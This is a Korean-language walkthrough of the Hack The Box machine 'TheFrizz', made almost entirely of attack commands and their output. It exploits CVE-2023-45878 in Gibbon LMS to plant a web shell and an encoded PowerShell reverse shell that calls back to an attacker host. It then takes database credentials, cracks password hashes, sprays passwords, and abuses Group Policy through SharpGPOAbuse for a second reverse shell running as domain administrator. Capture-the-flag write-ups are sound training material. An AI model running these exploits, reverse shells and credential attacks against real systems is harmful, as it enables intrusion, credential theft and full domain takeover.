Proof of Concept
10.129.232.168
Nmap
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPsslInitial Access
80 웹서비스 접속
- http://frizzdc.frizz.htb로 리다이렉트 됨
┌──(kali㉿kali)-[~/TheFrizz]
└─$ curl http://10.129.232.168:80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://frizzdc.frizz.htb/home/">here</a>.</p>
<hr>
<address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 10.129.232.168 Port 80</address>
</body></html>/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/TheFrizz]
└─$ cat /etc/hosts
<SNIP>
10.129.232.168 frizzdc.frizz.htb frizz.htbhttp://frizzdc.frizz.htb/home 접속
“Staff Login” 버튼 클릭
- 페이지 footer에서 Gibbon v25.0.00 사용하는 것을 확인
Gibbon LMS에서 RCE를 허용하는 PHP 파일을 생성 가능한 취약점 발견(CVE-2023-45878)
POC 코드 다운로드
┌──(kali㉿kali)-[~/TheFrizz]
└─$ git clone https://github.com/davidzzo23/CVE-2023-45878.git
Cloning into 'CVE-2023-45878'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 18 (delta 3), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 7.61 KiB | 7.61 MiB/s, done.
Resolving deltas: 100% (3/3), done.POC 실행
┌──(kali㉿kali)-[~/TheFrizz/CVE-2023-45878]
└─$ python CVE-2023-45878.py -t 10.129.232.168 -s -i 10.10.14.81 -p 4444
[+] Uploading web shell as jjhntmlr.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://10.129.232.168/Gibbon-LMS/jjhntmlr.php
[*] Make sure your listener is running: nc -lvnp 4444
[+] Executing command on: http://10.129.232.168/Gibbon-LMS/jjhntmlr.php?cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand CgAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADgAMQAiACwANAA0ADQANAApADsACgAgACAAIAAgACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AAoAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AAoAIAAgACAAIAB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsACgAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsACgAgACAAIAAgACAAIAAgACAAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAKACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7AAoAIAAgACAAIAAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQA7AAoAIAAgACAAIAB9AAoAIAAgACAAIAAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAA
[!] Error connecting to web shell: HTTPConnectionPool(host='10.129.232.168', port=80): Read timed out. (read timeout=5)리버스쉘 연결 성공
┌──(kali㉿kali)-[~/TheFrizz]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.232.168] 61985
whoami
frizz\w.webserviceAuth as f.frizzle
config.php 파일 확인
- DB 계정 정보 발견
- MrGibbonsDB/MisterGibbs!Parrot!?1
PS C:\xampp\htdocs\Gibbon-LMS> type config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker
<SNIP>
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';MySQL에서 gibbon 데이터베이스 내 테이블 탐색
- 계정 정보가 있을 것으로 추정되는 gibbonperson 테이블 발견
PS C:\xampp\mysql\bin> .\mysql.exe -uMrGibbonsDB -pMisterGibbs!Parrot!?1 -e 'show databases;'
Database
gibbon
information_schema
test
PS C:\xampp\mysql\bin> .\mysql.exe -uMrGibbonsDB -pMisterGibbs!Parrot!?1 gibbon -e 'show tables;'
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
gibbonactivitystaff
<SNIP>
gibbonperson
<SNIP>gibbonperson 테이블에서 사용자명, 해시화된 비밀번호, salt 값 발견
PS C:\xampp\mysql\bin> .\mysql.exe -uMrGibbonsDB -pMisterGibbs!Parrot!?1 gibbon -e 'select username, passwordStrong, passwordStrongSalt from gibbonperson'
username passwordStrong passwordStrongSalt
f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489해시 크랙
- Jenni_Luvs_Magic23
┌──(kali㉿kali)-[~/TheFrizz]
└─$ cat hash.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c0:/aACFhikmNopqrRTVz2489
┌──(kali㉿kali)-[~/TheFrizz]
└─$ hashcat -m 1420 hash.txt /usr/share/wordlists/rockyou.txt --quiet
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23SSH 접속 시도
- 패스워드 인증 불가
┌──(kali🎃kali)-[~/TheFrizz/CVE-2023-45878]
└─$ ssh f.frizzle@10.129.232.168
The authenticity of host '10.129.232.168 (10.129.232.168)' can't be established.
ED25519 key fingerprint is: SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.232.168' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
f.frizzle@10.129.232.168: Permission denied (gssapi-with-mic,keyboard-interactive).f.frizzle 계정으로 krb5.conf 파일 생성
┌──(kali🎃kali)-[~/TheFrizz/CVE-2023-45878]
└─$ sudo timedatectl set-ntp off
┌──(kali🎃kali)-[~/TheFrizz/CVE-2023-45878]
└─$ sudo rdate -n 10.129.232.168
Fri Jan 23 03:39:35 EST 2026
┌──(kali🎃kali)-[~/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' --generate-krb5-file krb5conf -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
┌──(kali🎃kali)-[~/TheFrizz]
└─$ cat krb5conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTBKerberos TGT 티켓 발급
┌──(kali🎃kali)-[~/TheFrizz]
└─$ export KRB5_CONFIG=krb5conf
┌──(kali🎃kali)-[~/TheFrizz]
└─$ kinit f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:
┌──(kali🎃kali)-[~/TheFrizz]
└─$ klist
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
01/23/2026 10:21:26 01/23/2026 20:21:26 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 01/24/2026 10:21:21Kerberos 인증을 통해 SSH 접속 성공
┌──(kali🎃kali)-[~/TheFrizz]
└─$ ssh f.frizzle@frizzdc.frizz.htb -K
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
PowerShell 7.4.5
PS C:\Users\f.frizzle>Read user.txt
PS C:\Users\f.frizzle\Desktop> type user.txt
25a7bdc579688ea250ca01de1768cf1a
PS C:\Users\f.frizzle\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::6ccd:20b4:a0a0:3e99
Link-local IPv6 Address . . . . . : fe80::4242:f2e0:ab4f:bae4%5
IPv4 Address. . . . . . . . . . . : 10.129.232.168
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1Auth as M.SchoolBus
C:$RECYCLE.BIN에서 S-1-5-21-2386970044-1145388522-2932701813-1103 디렉토리 발견
PS C:\> cd 'C:\$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> ls -force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103해당 디렉토리안에서 7z 파일 두 개 발견
PS C:\$RECYCLE.BIN> cd .\S-1-5-21-2386970044-1145388522-2932701813-1103\
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> ls -force
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a---- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-a-hs- 10/29/2024 7:31 AM 129 desktop.ini$IE2XMEG.7z 파일을 칼리 리눅스로 이동
The authenticity of host '10.10.14.81 (10.10.14.81)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Warning: Permanently added '10.10.14.81' (ED25519) to the list of known hosts.
kali@10.10.14.81's password:
$RE2XMEG.7z 100% 29MB 3.6MB/s 00:08$IE2XMEG.7z 파일 압축 해제
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ 7z e \$RE2XMEG.7z
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)
Extracting archive: $RE2XMEG.7z
--
Path = $RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3
Would you like to replace the existing file:
Path: ./REQUESTED
Size: 0 bytes
Modified: 2024-09-10 19:25:32
with the file from archive:
Path: wapt/lib/site-packages/Babel-2.9.1.dist-info/REQUESTED
Size: 0 bytes
Modified: 2024-09-10 19:25:36
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? A
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987압축 해제된 파일들에서 비밀번호 탐색
- ./waptserver.ini 파일에서 Base64로 인코딩된 비밀번호를 발견했으며, 이를 디코딩하여 평문 비밀번호 획득
- !suBcig@MehTed!R
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ grep -i -r password .
grep: ./_md4.cpython-38.pyc: binary file matches
grep: ./securetransport.cpython-38.pyc: binary file matches
grep: ./_hashlib.pyd: binary file matches
grep: ./errorcodes.cpython-38.pyc: binary file matches
grep: ./wmi.cpython-38.pyc: binary file matches
grep: ./wgetwads32.exe: binary file matches
grep: ./win32serviceutil.cpython-38.pyc: binary file matches
grep: ./_ntlm.cpython-38.pyc: binary file matches
grep: ./signer.cpython-38.pyc: binary file matches
grep: ./pyadconstants.cpython-38.pyc: binary file matches
grep: ./_negotiate.cpython-38.pyc: binary file matches
grep: ./win32ras.pyd: binary file matches
grep: ./libssl-3.dll: binary file matches
grep: ./sha2_crypt.cpython-38.pyc: binary file matches
<SNIP>
./waptserver.ini:wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
<SNIP>
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ echo IXN1QmNpZ0BNZWhUZWQhUgo= | base64 -d
!suBcig@MehTed!R사용자 목록 추출
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ nxc smb frizzdc.frizz.htb -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -k --users-export users.txt
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB frizzdc.frizz.htb 445 frizzdc -Username- -Last PW Set- -BadPW- -Description-
SMB frizzdc.frizz.htb 445 frizzdc Administrator 2025-02-25 21:24:10 0 Built-in account for administering the computer/domain
SMB frizzdc.frizz.htb 445 frizzdc Guest <never> 0 Built-in account for guest access to the computer/domain
SMB frizzdc.frizz.htb 445 frizzdc krbtgt 2024-10-29 14:19:54 0 Key Distribution Center Service Account
SMB frizzdc.frizz.htb 445 frizzdc f.frizzle 2024-10-29 14:27:03 0 Wizard in Training
SMB frizzdc.frizz.htb 445 frizzdc w.li 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc h.arm 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc M.SchoolBus 2024-10-29 14:27:03 0 Desktop Administrator
SMB frizzdc.frizz.htb 445 frizzdc d.hudson 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc k.franklin 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc l.awesome 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc t.wright 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc r.tennelli 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc J.perlstein 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc a.perlstein 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc p.terese 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc v.frizzle 2024-10-29 14:27:04 0 The Wizard
SMB frizzdc.frizz.htb 445 frizzdc g.frizzle 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc c.sandiego 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc c.ramon 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc m.ramon 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc w.Webservice 2024-10-29 14:27:04 0 Service for the website
SMB frizzdc.frizz.htb 445 frizzdc [*] Enumerated 21 local users: frizz
SMB frizzdc.frizz.htb 445 frizzdc [*] Writing 21 local users to users.txtPassword Spraying 공격 수행
- M.SchoolBus:!suBcig@MehTed!R로 인증 성공
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ nxc smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k -t 100
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.li:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!Rf.frizzle 계정을 통해 SSH 접속할 때와 동일한 방법을 사용하여 M.SchoolBus 계정으로 SSH 접속
┌──(kali🎃kali)-[~/TheFrizz]
└─$ sudo rdate -n 10.129.232.168
[sudo] password for kali:
rdate: Inconsistent times received from NTP server
rdate: Unable to get a reasonable time estimate
┌──(kali🎃kali)-[~/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -u 'M.SchoolBus' -p '!suBcig@MehTed!R' --generate-krb5-file krb5conf2 -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
┌──(kali🎃kali)-[~/TheFrizz]
└─$ export KRB5_CONFIG=krb5conf2
┌──(kali🎃kali)-[~/TheFrizz]
└─$ kinit M.SchoolBus@FRIZZ.HTB
Password for M.SchoolBus@FRIZZ.HTB:
┌──(kali🎃kali)-[~/TheFrizz]
└─$ ssh -K M.SchoolBus@FRIZZ.HTB
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>Privilege Escalation
Bloodhound 정보 수집
- The user M.SCHOOLBUS@FRIZZ.HTB has has the permissions to modify the gPLink attribute of OU DOMAIN CONTROLLERS@FRIZZ.HTB. → The ability to alter the gPLink attribute may allow an attacker to apply a malicious Group Policy Object (GPO) to all child user and computer objects (including the ones located in nested OUs). This can be exploited to make said child objects execute arbitrary commands through an immediate scheduled task, thus compromising them.
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ nxc ldap frizzdc.frizz.htb -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -k --bloodhound -c All --dns-server 10.129.232.168
LDAP frizzdc.frizz.htb 389 FRIZZDC [*] None (name:FRIZZDC) (domain:frizz.htb)
LDAP frizzdc.frizz.htb 389 FRIZZDC [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
LDAP frizzdc.frizz.htb 389 FRIZZDC Resolved collection methods: localadmin, rdp, objectprops, session, group, psremote, container, trusts, acl, dcom
LDAP frizzdc.frizz.htb 389 FRIZZDC Using kerberos auth without ccache, getting TGT
[19:08:56] ERROR Unhandled exception in computer frizzdc.frizz.htb processing: The NETBIOS computers.py:268
connection with the remote host timed out.
LDAP frizzdc.frizz.htb 389 FRIZZDC Done in 00M 25S
LDAP frizzdc.frizz.htb 389 FRIZZDC Compressing output into /home/kali/.nxc/logs/FRIZZDC_frizzdc.frizz.htb_2026-01-24_190830_bloodhound.zipEvilGPO라는 새 그룹 정책을 생성하고 Domain Controllers OU에 연결
PS C:\Users\M.SchoolBus\Desktop> New-GPO -Name "EvilGPO"
DisplayName : EvilGPO
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : da1f3942-ec4a-462d-b0bf-f215b41a5dfb
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 1/25/2026 4:50:05 AM
ModificationTime : 1/25/2026 4:50:06 AM
UserVersion :
ComputerVersion :
WmiFilter :
PS C:\Users\M.SchoolBus\Desktop> New-GPLink -Name "EvilGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : da1f3942-ec4a-462d-b0bf-f215b41a5dfb
DisplayName : EvilGPO
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2SharpGPOAbuse를 사용하여 EvilGPO에 리버스 쉘을 연결하는 작업 스케줄러를 추가하고, gpupdate로 GPO를 강제 적용
PS C:\Users\M.SchoolBus\Desktop>
PS C:\Users\M.SchoolBus\Desktop> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author frizz.htb\Administrator --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --GPOName "EvilGPO"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "EvilGPO" is: {DA1F3942-EC4A-462D-B0BF-F215B41A5DFB}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{DA1F3942-EC4A-462D-B0BF-F215B41A5DFB}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus\Desktop> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.리버스쉘 연결 성공
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.232.168] 57323
PS C:\Windows\system32>Read root.txt
PS C:\Users\Administrator\Desktop> type root.txt
39c2947105c0ce6e3f15365b164244fa
PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::950b:6c07:4edf:da3b
Link-local IPv6 Address . . . . . : fe80::f3b8:2aba:2c88:49c0%5
IPv4 Address. . . . . . . . . . . : 10.129.232.168
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1